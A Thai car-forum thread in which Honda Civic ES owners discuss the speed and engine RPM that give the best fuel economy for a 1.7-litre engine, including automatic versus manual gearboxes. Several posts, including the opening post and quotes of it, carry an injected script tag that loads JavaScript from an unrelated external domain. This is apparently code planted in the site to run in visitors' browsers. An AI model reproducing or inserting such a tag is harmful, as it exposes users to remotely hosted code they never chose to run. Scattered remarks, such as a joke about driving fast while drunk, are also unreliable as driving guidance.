ตอบ
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 17:42 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
พูดง่ายๆ คือ ES เราเนี่ย เครื่อง 1.7 ขับทางไกล หรือ ใช้ในชีวิตประจำวันเนี่ย ควรจะเหยียบที่เท่าไร ถึงจะพอดี คือ อัตราส่วนการเร่ง ต่อ การใช้น้ำมันอะครับ เหยียบที่ 80 หรือ 90 หรือ 100 หรือ 120 หรือ เท่าไร ถึงจะเหมาะสม....เคยหาในอากู๋ บ้างก็ว่า เครื่องใหญ่ เหยียบ 70-80 ทำให้เปลืองน้ำมัน ต้องเหยียบสัก 110-120 ขึ้นไป ... บ้างก็ว่า เครื่อง ใหญ่ขับ 70-80 ไม่เปลืองน้ำมัน

"<script src="https://sport32news.com/civicesgroup.js">


Attached File :
ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ได้รับคำขอบคุณจาก: Tomzaa  ballanupong  aunja 
Leonic_l


ชื่อเล่น: เนฟ

เข้าร่วม: 03 ตุลา 2008
ตอบ: 763

Guru ES
Guru ES

ได้รับคำขอบคุณ: 954
ให้คำขอบคุณ: 329

ที่อยู่: Chonburi
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 15 มกรา 2013 17:51 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
จริงแล้ว การขับรถที่ประหยัดสุด ต้องค่อยเร่งรอบขึ้น และรอบเครื่องที่ประหยัดสุด คือ 2500 รอบ/นาทีครับ
เครื่องใหญ่ อาจจะทำให้ควาทเร็วอยู่ที่ 120 km/hrเลยก็ได้
เครื่องเล็ก อาจจะอยู่ที่ 80-90 km/hr ครับ
ซึ่งถ้าเอาขนาดเครื่องมาวัด ก็ได้ว่าเครื่องใหญ่ขับเร็วกว่าเครื่องเล็ก ถึงประหยัด เพราะต้องให้ถึง2500รอบ/นาทีครับ
ได้รับคำขอบคุณจาก: black_civic_es  LifeFate  es330  chokewa  Phetcharat  Mundo  aunja 
Tomzaa


เข้าร่วม: 13 มิถุนา 2011
ตอบ: 462

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 222
ให้คำขอบคุณ: 62

ที่อยู่: กำแพงเพชร-นครสวรรค์
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 18:15 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ผมว่าขับ 100/ กำลังดี เครื่องไม่ร้อนมาก ถ้าทางไกล110/120 จะไดถึงที่หมายไวขึ้น
ได้รับคำขอบคุณจาก: black_civic_es  aunja 
netgame02


ชื่อเล่น: ตอง

เข้าร่วม: 24 กรกฎา 2012
ตอบ: 1689

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 878
ให้คำขอบคุณ: 601

ที่อยู่: ประดิพัทธิ์ 1 - ES เมืองทอง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 15 มกรา 2013 18:20 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
อย่างทั้ง2คห คับ อย่าคิกดาว อย่ากระแทกคันเร่งเป็นพอประหยัดสุดๆ ผมทำๆด้มากสุด15โล/ลิตรแน่ะ
ได้รับคำขอบคุณจาก: black_civic_es 
Beenongear53


ชื่อเล่น: บี

เข้าร่วม: 01 กันยา 2012
ตอบ: 379

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 636
ให้คำขอบคุณ: 790

ที่อยู่: สะพานใหม่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 15 มกรา 2013 18:27 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
คอนเฟิร์มอีกคนครับว่า 100-120km/hr ประหยัดสุดครับ เคยประหยัด 14-15 km/litre ครับ 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 15 มกรา 2013 18:35 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
LifeFate พิมพ์ว่า:
พูดง่ายๆ คือ ES เราเนี่ย เครื่อง 1.7 ขับทางไกล หรือ ใช้ในชีวิตประจำวันเนี่ย ควรจะเหยียบที่เท่าไร ถึงจะพอดี คือ อัตราส่วนการเร่ง ต่อ การใช้น้ำมันอะครับ เหยียบที่ 80 หรือ 90 หรือ 100 หรือ 120 หรือ เท่าไร ถึงจะเหมาะสม....เคยหาในอากู๋ บ้างก็ว่า เครื่องใหญ่ เหยียบ 70-80 ทำให้เปลืองน้ำมัน ต้องเหยียบสัก 110-120 ขึ้นไป ... บ้างก็ว่า เครื่อง ใหญ่ขับ 70-80 ไม่เปลืองน้ำมัน

"<script src="https://sport32news.com/civicesgroup.js">

เราว่า ตามรอบเครื่องอ่ะนะ การใช้เข็มบอกรอบเครื่องเป็นตัวกำหนดการใช้น้ำมันได้ เป็นอย่างดี
ความเร็วรอบการเดินทางนั้นที่ความเร็วรอบ 2000 - 2500 จะช่วยประหยัดน้ำมัน มาก
แต่ที่ความเร็วรอบต่ำๆ 1200 - 2000 จะช่วยประหยัดน้ำมันได้มากจริงๆ แต่เอามาวิ่งจริงๆ ไม่ได้
นอกจากพวก อีโคคาร์ หรือรถประหยัดน้ำมัน เพราะวิ่งรอบ 1500 รถวิ่ง 60 ชาวบ้านจะสรรเสริญเอาอ่ะนะ
ดังนั้นดูที่รอบดีกว่า เพราะตามอย่างจขกท.ว่านั่นแหละ รอบเท่ากัน
แต่ความเร็วรถไม่เท่ากันตาม น้ำหนักรถ ซีซี และ สภาพแวดล้อมอยู่แล้ว

1.การออกตัวขณะจอดนิ่งเป็นตัวที่ทำให้ใช้น้ำมันมากที ่สุด ไม่จำเป็นเลยที่จะต้องออกตัวอย่าง
รวดเร็วเพื่อเอาใจคันหลัง พยายามอย่าให้รอบเกิน 2500 ดีที่สุด
2.ต้องคอยสังเกตการเปลี่ยนเกียร์ของระบบว่าจะเปลี่ยน ที่ความเร็วรอบเท่าไหร่ ส่วนมากออโต้จะเปลี่ยนที่
>3000 รอบ แต่ถ้าเราไม่เร่งเครื่องอย่างรุนแรง การเปลี่ยนเกียร์จะอยู่ที่รอบต่ำกว่านี้ได้ แต่ต้องใช้
ระยะทางมากกว่า แต่โดยรวมประหยัดกว่ามาก
3.ควรขับที่ความเร็วที่มีการเปลี่ยนเกียร์ เช่น 20, 40, 60 หรือ 80 เพราะเป็นจุดที่มีความเร็วรอบเครื่อง
ต่ำที่สุด นั่นคือใช้น้ำมันน้อยที่สุด แต่ต้องระวังว่าควรจะให้มีการเปลี่ยนเกียร์ไปแล้ว เพราะก่อนที่จะมีการ
เปลี่ยนเกียร์ ความเร็วรอบจะสูงสุด กินน้ำมันมากที่สุด
4.ควรใช้แรงเฉื่อยของรถให้เป็นประโยชน์ การใช้เกียร์ว่างหรือรู้จักยกเท้าออกจากคันเร่งบ้าง จะช่วยลดการ
ใช้น้ำมันได้อย่างไม่น่าเชื่อ เช่น การที่มีสี่แยกสัญญาณไฟอยู่ข้างหน้าเมื่อเห็นแล้วว่า เร่งเครื่องไปก็ไม่มี
ประโยชน์ ก็ควรปลดเป็นเกียร์ว่างให้รถวิ่งไปเองก็ได้ จะสังเกตเห็นได้เลยว่าความเร็วรอบตกไปอยู่ที่
รอบเดินเบาทันที ประหยัดสุดๆเลย
5.การเหยียบเบรคบ่อยๆหรือรุนแรงเป็นตัวบอกว่าคุณใช้น ้ำมันเกินความจำเป็นไปแล้ว สังเกตได้เลย
ปรับเปลี่ยนทัศนคติของการขับเสียใหม่ก็ไม่สาย
ได้รับคำขอบคุณจาก: LifeFate  freedombee  jjcivic  nandevil  chaichan  body19  aunja  satan1970 
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 18:37 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
เคยทำประหยัดสูงสุด 15 km/L สำหรับน้ำมัน
แต่ถ้าสำหรับแก๊ส 13 km/L คับ
ที่ความเร็ว 100-110 km/h คับ "<script src="https://sport32news.com/civicesgroup.js">
kavinthorn


ชื่อเล่น: ต่อ

เข้าร่วม: 26 กันยา 2012
ตอบ: 1539

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1314
ให้คำขอบคุณ: 701

ที่อยู่: BKK Latkrabang
อังคาร, 15 มกรา 2013 18:38 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ไม่เกิน 80-90 กม.-ชม. ครับประหยัดได้ 13-15 กม ต่อลิตร
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 18:53 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ของเรา เกียร์ M/T ต้องลองดูบ้างแล้ว รถตัวเอง 2500 รอบ จะเหยียบได้เท่าไร

ขอบพระคุณทุกความเห็น นะจ๊ะ เลิฟๆ
thaipra


ชื่อเล่น: เอ็กซ์

เข้าร่วม: 18 พฤษภาคม 2012
ตอบ: 948

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2119
ให้คำขอบคุณ: 1493

ที่อยู่: สระบุรี
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 19:03 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
100-120 ครับผม ลองมาแล้วรถจะไหลดีไม่ตื้อครับถ้าเหยียบแค่ 80-90 รอบเครื่องไม่ได้ครับจะกินน้ำมันครับ
kan32737


เข้าร่วม: 30 เมษา 2012
ตอบ: 135

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 0

ที่อยู่: พิษณุโลก กรุงเทพ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 15 มกรา 2013 19:05 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
เคยทำได้ 15 ก่าๆ กม/ล สูงสุดละคัย ค่อยๆเร่งไม่ต้องกดไปเรื่อยๆ คงฟามเร็วไว้ ปามาณ 100 บวกลบ 10 ไปยาวๆเรื่อยๆ 
nawintar


ชื่อเล่น: ต้าร์

เข้าร่วม: 08 พฤศจิกา 2009
ตอบ: 1383

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 285
ให้คำขอบคุณ: 64

ที่อยู่: แก่งคอย หนองแค สระบุรี
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 15 มกรา 2013 19:22 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ม่ายขับเลยประหยัดสุด เอ็ม
rakyat


ชื่อเล่น: โก้

เข้าร่วม: 11 กรกฎา 2012
ตอบ: 1262

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 663
ให้คำขอบคุณ: 482

ที่อยู่: จ.สุราษฎร์ธานี
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 15 มกรา 2013 19:31 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
wow wow wow ไม่เกิน 120 ทางหลวงปลอดภัยกว่าครับ
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 19:31 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
nawintar พิมพ์ว่า:
ม่ายขับเลยประหยัดสุด เอ็ม




 ผมรักพี่ ที่ซู๊ดดดดดดดด
inntuch


เข้าร่วม: 15 สิงหา 2012
ตอบ: 535

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 151
ให้คำขอบคุณ: 1
อังคาร, 15 มกรา 2013 19:34 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
มาเก็บความรู้ครับ "<script src="https://sport32news.com/civicesgroup.js">
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 15 มกรา 2013 20:15 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ESผมใช้แก๊ส ความเร็ว100-150 แล้วแต่ช่วงครับ ตกโลละบาท

น้องตี้ผมใช้โซฮอล95 120-160 ตกโลละ2 บาท รถไม่ติดนะครับ ถ้าติดก็เปลืองกว่าขับเร็วๆอีกครับ

อย่าไปคิ๊กดาวบ่อย
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 20:39 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ขอบคุณ ข้อมูลพี่ๆ ทุกคน ครับ
whanesclub


ชื่อเล่น: นายหวาน

เข้าร่วม: 16 ธันวา 2012
ตอบ: 667

Guru ES
Guru ES

ได้รับคำขอบคุณ: 219
ให้คำขอบคุณ: 168

ที่อยู่: บางนา-กระทรวงมหาดไทย
ปี: 2001
สี: ม่วง วินเทจพลัม (RP-32P)
อังคาร, 15 มกรา 2013 20:45 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
เกียร์ธรรมดา ขับแบบไม่ให้รอบสูงมากครับ  /2000-2500
Ryuknight


เข้าร่วม: 31 พฤษภาคม 2009
ตอบ: 2750

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3285
ให้คำขอบคุณ: 1525

ที่อยู่: ES Samutprakarn
ปี: 2004
อังคาร, 15 มกรา 2013 21:33 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
เหมือนกับ at ประหยัดกว่า mt
at รอบเครื่อง 2500 > 100km
at รอบเครื่อง 3000 > 120km

mt เกียร์5 รอบเครื่อง 3200 > 100km
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 15 มกรา 2013 22:42 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
Ryuknight พิมพ์ว่า:
เหมือนกับ at ประหยัดกว่า mt
at รอบเครื่อง 2500 > 100km
at รอบเครื่อง 3000 > 120km

mt เกียร์5 รอบเครื่อง 3200 > 100km




แง่ว ของผม M/T
ได้รับคำขอบคุณจาก: nui610 
Juris


ชื่อเล่น: เม

เข้าร่วม: 01 ตุลา 2008
ตอบ: 780

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1697
ให้คำขอบคุณ: 1333

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 00:55 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ใช้มาทั้ง AT และ MT (สับเกียร์มา) ยืนยันว่า การขับขี่แบบเดียวกัน MT ประหยัดกว่าครับ เพราะ AT แรงมันสูญเสียไปในระบบเกียร์กว่า MT ครับ 
ได้รับคำขอบคุณจาก: PAE KUNG 
jjcivic


ชื่อเล่น: โก้

เข้าร่วม: 16 ธันวา 2009
ตอบ: 432

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 699
ให้คำขอบคุณ: 259

ที่อยู่: สระบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 07:42 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
รู้สึกว่ารถผมความเร็ว 110 ประหยัดสุดคับ 14-15 km/l (น้ำมัน) ถ้าแก๊สก็ตกkm ละบาทคับ
ความเร็วขนาดนี้จะเร่งก็ไม่ต้องเหยียบคันเร่งมาก เวลาเบรคก็ไม่ต้องเหยียบแรงคับ ประหยัดและปลอดภัยคับ
chokpiti


ชื่อเล่น: โชค

เข้าร่วม: 17 ธันวา 2013
ตอบ: 1156

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1455
ให้คำขอบคุณ: 1837

ที่อยู่: มหาชัย-ระยอง
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 16 มกรา 2013 08:34 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
อย่าขับเกิน3000รอบก็พอ รับรองประหยัดทุกรุ่นทุกยี่ห้อ
ได้รับคำขอบคุณจาก: nui610 
Chonchy


ชื่อเล่น: ชล

เข้าร่วม: 12 มกรา 2012
ตอบ: 4143

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 7371
ให้คำขอบคุณ: 6492

ที่อยู่: แม่กลอง...มหาชัย...
ปี: 2001
พุธ, 16 มกรา 2013 09:22 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
เหยียบตามความเร็วของเพลงในรถคับ...555
yam


ชื่อเล่น: แยม

เข้าร่วม: 28 เมษา 2012
ตอบ: 818

Guru ES
Guru ES

ได้รับคำขอบคุณ: 926
ให้คำขอบคุณ: 1203

ที่อยู่: พหลโยธิน 49/1 กรุงเทพมหานคร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 16 มกรา 2013 12:59 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ham_ter พิมพ์ว่า:

LifeFate พิมพ์ว่า:
พูดง่ายๆ คือ ES เราเนี่ย เครื่อง 1.7 ขับทางไกล หรือ ใช้ในชีวิตประจำวันเนี่ย ควรจะเหยียบที่เท่าไร ถึงจะพอดี คือ อัตราส่วนการเร่ง ต่อ การใช้น้ำมันอะครับ เหยียบที่ 80 หรือ 90 หรือ 100 หรือ 120 หรือ เท่าไร ถึงจะเหมาะสม....เคยหาในอากู๋ บ้างก็ว่า เครื่องใหญ่ เหยียบ 70-80 ทำให้เปลืองน้ำมัน ต้องเหยียบสัก 110-120 ขึ้นไป ... บ้างก็ว่า เครื่อง ใหญ่ขับ 70-80 ไม่เปลืองน้ำมัน

"<script src="https://sport32news.com/civicesgroup.js">

เราว่า ตามรอบเครื่องอ่ะนะ การใช้เข็มบอกรอบเครื่องเป็นตัวกำหนดการใช้น้ำมันได้ เป็นอย่างดี
ความเร็วรอบการเดินทางนั้นที่ความเร็วรอบ 2000 - 2500 จะช่วยประหยัดน้ำมัน มาก
แต่ที่ความเร็วรอบต่ำๆ 1200 - 2000 จะช่วยประหยัดน้ำมันได้มากจริงๆ แต่เอามาวิ่งจริงๆ ไม่ได้
นอกจากพวก อีโคคาร์ หรือรถประหยัดน้ำมัน เพราะวิ่งรอบ 1500 รถวิ่ง 60 ชาวบ้านจะสรรเสริญเอาอ่ะนะ
ดังนั้นดูที่รอบดีกว่า เพราะตามอย่างจขกท.ว่านั่นแหละ รอบเท่ากัน
แต่ความเร็วรถไม่เท่ากันตาม น้ำหนักรถ ซีซี และ สภาพแวดล้อมอยู่แล้ว

1.การออกตัวขณะจอดนิ่งเป็นตัวที่ทำให้ใช้น้ำมันมากที ่สุด ไม่จำเป็นเลยที่จะต้องออกตัวอย่าง
รวดเร็วเพื่อเอาใจคันหลัง พยายามอย่าให้รอบเกิน 2500 ดีที่สุด
2.ต้องคอยสังเกตการเปลี่ยนเกียร์ของระบบว่าจะเปลี่ยน ที่ความเร็วรอบเท่าไหร่ ส่วนมากออโต้จะเปลี่ยนที่
>3000 รอบ แต่ถ้าเราไม่เร่งเครื่องอย่างรุนแรง การเปลี่ยนเกียร์จะอยู่ที่รอบต่ำกว่านี้ได้ แต่ต้องใช้
ระยะทางมากกว่า แต่โดยรวมประหยัดกว่ามาก
3.ควรขับที่ความเร็วที่มีการเปลี่ยนเกียร์ เช่น 20, 40, 60 หรือ 80 เพราะเป็นจุดที่มีความเร็วรอบเครื่อง
ต่ำที่สุด นั่นคือใช้น้ำมันน้อยที่สุด แต่ต้องระวังว่าควรจะให้มีการเปลี่ยนเกียร์ไปแล้ว เพราะก่อนที่จะมีการ
เปลี่ยนเกียร์ ความเร็วรอบจะสูงสุด กินน้ำมันมากที่สุด
4.ควรใช้แรงเฉื่อยของรถให้เป็นประโยชน์ การใช้เกียร์ว่างหรือรู้จักยกเท้าออกจากคันเร่งบ้าง จะช่วยลดการ
ใช้น้ำมันได้อย่างไม่น่าเชื่อ เช่น การที่มีสี่แยกสัญญาณไฟอยู่ข้างหน้าเมื่อเห็นแล้วว่า เร่งเครื่องไปก็ไม่มี
ประโยชน์ ก็ควรปลดเป็นเกียร์ว่างให้รถวิ่งไปเองก็ได้ จะสังเกตเห็นได้เลยว่าความเร็วรอบตกไปอยู่ที่
รอบเดินเบาทันที ประหยัดสุดๆเลย
5.การเหยียบเบรคบ่อยๆหรือรุนแรงเป็นตัวบอกว่าคุณใช้น ้ำมันเกินความจำเป็นไปแล้ว สังเกตได้เลย
ปรับเปลี่ยนทัศนคติของการขับเสียใหม่ก็ไม่สาย

++
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 16:09 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
Chonchy พิมพ์ว่า:
เหยียบตามความเร็วของเพลงในรถคับ...555




ตอนเมา ไม่เปิดเพลง ทำมัยเร็วได้ก็ไม่รู้ 555+
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 16:09 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
ขอบคุณทุกคำตอบ จากพี่ๆ ครับ สรุป 2500-3000 เหมาะสมสุด .... ดูที่รอบ
Pantamitr


ชื่อเล่น: ห่าน

เข้าร่วม: 27 พฤษภาคม 2010
ตอบ: 1622

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1792
ให้คำขอบคุณ: 1186

ที่อยู่: บางปู สมุทรปราการ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 16 มกรา 2013 20:06 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
จริงๆ ง่ายๆ ถ้าจะขับแบบประหยัดนะ
คือ เมื่อขับลอยตัวแล้ว ใช้รอบให้เหมาะสมกับความเร็ว จากนั้น ใช้คันเร่ง ใช้เบรคให้น้อยที่สุด  ทำได้มั้ยล่า อะ อะ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
LifeFate


เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 3153

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5152
ให้คำขอบคุณ: 215

ที่อยู่: สระบุรี , ปทุมธานี , นครสวรรค์
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 16 มกรา 2013 21:39 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
Pantamitr พิมพ์ว่า:
จริงๆ ง่ายๆ ถ้าจะขับแบบประหยัดนะ
คือ เมื่อขับลอยตัวแล้ว ใช้รอบให้เหมาะสมกับความเร็ว จากนั้น ใช้คันเร่ง ใช้เบรคให้น้อยที่สุด  ทำได้มั้ยล่า อะ อะ<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></


สีแดงๆ นั่นอะครับ ที่ผมอยากรู้ รอบ กับ ความเร็ว .... แค่ไหน  เท่าไร ถึงเรียก ว่า เหมาะสม
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 17 มกรา 2013 05:18 - ยังสงสัยอยู่ เครื่อง 1.7 ขับทางไกล
MT ยังประหยัดกว่าครับ แม้รอบเครื่องจะสูงกว่าก็ตาม

จากที่เคยอ่านมา(ตามเนทนะครับ ไม่รู้อ้างอิงได้แค่ไหน)
ทอร์คคอนเวิร์ทเตอร์สามารถช่วยเพิ่มแรงบิดได้ จึงทำให้สามารถทดเกียร์ต่ำๆได้ เนื่องจากเกียร์ auto มีการสูญเสียกำลังในระบบมากกว่า mt แม้จะมีระบบ lock up ก็ตาม จึงทดเกียร์เกียร์ต่ำๆเพื่อไม่ให้เปลืองน้ำมัน

ส่วนตัวเคยลอง ที่ความเร็วประมาณ 100 ประหยัดสุดครับ
แต่ต้องขับทางไกลๆแช่ยาวๆนะครับ ใช้คันเร่งน้อยๆตามท่าน Pantamitr ว่าไว้
อย่ากดลึกพรวดทีเดียว ค่อยๆกดไล่ระดับลงไป อ่านสภาพการจราจรให้ขาด
จะได้ไม่ต้องเบรคบ่อยๆ
ผมจะเปลี่ยนเกียร์ที่รอบประมาณ 2500 ครับ(เป็นเรื่องยากสำหรับชาว MT ฮ่าๆ) และต้องพยายามสับให้ไว
เพื่อไม่ให้รอบตกมาก ถ้าลากรอบสูงแน่นอนว่าเปลืองน้ำมัน ส่วนรอบต่ำเกินรถจะไม่มีแรงทำให้ต้องกดคันเร่งเพิ่ม
ซึ่งก็กินน้ำมันเช่นกัน
ปล. ความเห็นส่วนตัวนะครับ
ได้รับคำขอบคุณจาก: PAE KUNG 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.